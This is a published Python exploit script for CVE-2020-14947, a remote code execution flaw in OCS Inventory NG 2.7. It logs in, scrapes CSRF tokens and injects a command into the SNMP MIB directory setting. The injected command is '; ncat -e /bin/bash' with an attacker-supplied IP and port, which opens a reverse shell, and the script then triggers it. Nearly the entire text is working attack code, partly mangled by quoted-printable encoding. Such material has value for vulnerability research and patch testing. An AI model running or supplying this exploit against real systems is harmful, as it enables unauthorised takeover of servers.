OCS Inventory NG 2.7 Remote Code Execution

`# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution  
# Date: 2020-06-05  
# Exploit Author: Askar (@mohammadaskar2)  
# CVE: CVE-2020-14947  
# Vendor Homepage: https://ocsinventory-ng.org/  
# Version: v2.7  
# Tested on: Ubuntu 18.04 / PHP 7.2.24  
  
#!/usr/bin/python3  
  
  
import requests  
import sys  
import warnings  
import random  
import string  
from bs4 import BeautifulSoup  
from urllib.parse import quote  
  
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')  
  
  
if len(sys.argv) !=3D 6:  
print("[~] Usage : ./ocsng-exploit.py url username password ip port")  
exit()  
  
url =3D sys.argv[1]  
username =3D sys.argv[2]  
password =3D sys.argv[3]  
ip =3D sys.argv[4]  
port =3D sys.argv[5]  
  
request =3D requests.session()  
  
  
def login():  
login_info =3D {  
"Valid_CNX": "Send",  
"LOGIN": username,  
"PASSWD": password  
}  
login_request =3D request.post(url+"/index.php", login_info)  
login_text =3D login_request.text  
if "User not registered" in login_text:  
return False  
else:  
return True  
  
  
def inject_payload():  
csrf_req =3D request.get(url+"/index.php?function=3Dadmin_conf")  
content =3D csrf_req.text  
soup =3D BeautifulSoup(content, "lxml")  
first_token =3D soup.find_all("input", id=3D"CSRF_10")[0].get("value")  
print("[+] 1st token : %s" % first_token)  
first_data =3D {  
"CSRF_10": first_token,  
"onglet": "SNMP",  
"old_onglet": "INVENTORY"  
}  
req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=3Dfir=  
st_data)  
content2 =3D req.text  
soup2 =3D BeautifulSoup(content2, "lxml")  
second_token =3D soup2.find_all("input", id=3D"CSRF_14")[0].get("value"=  
)  
print("[+] 2nd token : %s" % second_token)  
payload =3D "; ncat -e /bin/bash %s %s #" % (ip, port)  
#RELOAD_CONF=3D&Valid=3DUpdate  
inject_request =3D {  
"CSRF_14": second_token,  
"onglet": "SNMP",  
"old_onglet": "SNMP",  
"SNMP": "0",  
"SNMP_INVENTORY_DIFF": "1",  
# The payload should be here  
"SNMP_MIB_DIRECTORY": payload,  
"RELOAD_CONF": "",  
"Valid": "Update"  
}  
final_req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=  
=3Dinject_request)  
if "Update done" in final_req.text:  
print("[+] Payload injected successfully")  
execute_payload()  
  
  
def execute_payload():  
csrf_req =3D request.get(url+"/index.php?function=3DSNMP_config")  
content =3D csrf_req.text  
soup =3D BeautifulSoup(content, "lxml")  
third_token =3D soup.find_all("input", id=3D"CSRF_22")[0].get("value")  
third_request =3D request.post(url+"/index.php?function=3DSNMP_config",=  
files=3D{  
'CSRF_22': (None, third_token),  
'onglet': (None, 'SNMP_MIB'),  
'old_onglet': (None, 'SNMP_RULE'),  
'snmp_config_length': (None, '10')  
})  
print("[+] 3rd token : %s" % third_token)  
third_request_text =3D third_request.text  
soup =3D BeautifulSoup(third_request_text, "lxml")  
forth_token =3D soup.find_all("input", id=3D"CSRF_26")[0].get("value")  
print("[+] 4th token : %s" % forth_token)  
print("[+] Triggering payload ..")  
print("[+] Check your nc ;)")  
forth_request =3D request.post(url+"/index.php?function=3DSNMP_config",=  
files=3D{  
'CSRF_26': (None, forth_token),  
'onglet': (None, 'SNMP_MIB'),  
'old_onglet': (None, 'SNMP_MIB'),  
'update_snmp': (None, 'send')  
})  
  
  
  
if login():  
print("[+] Valid credentials!")  
inject_payload()  
`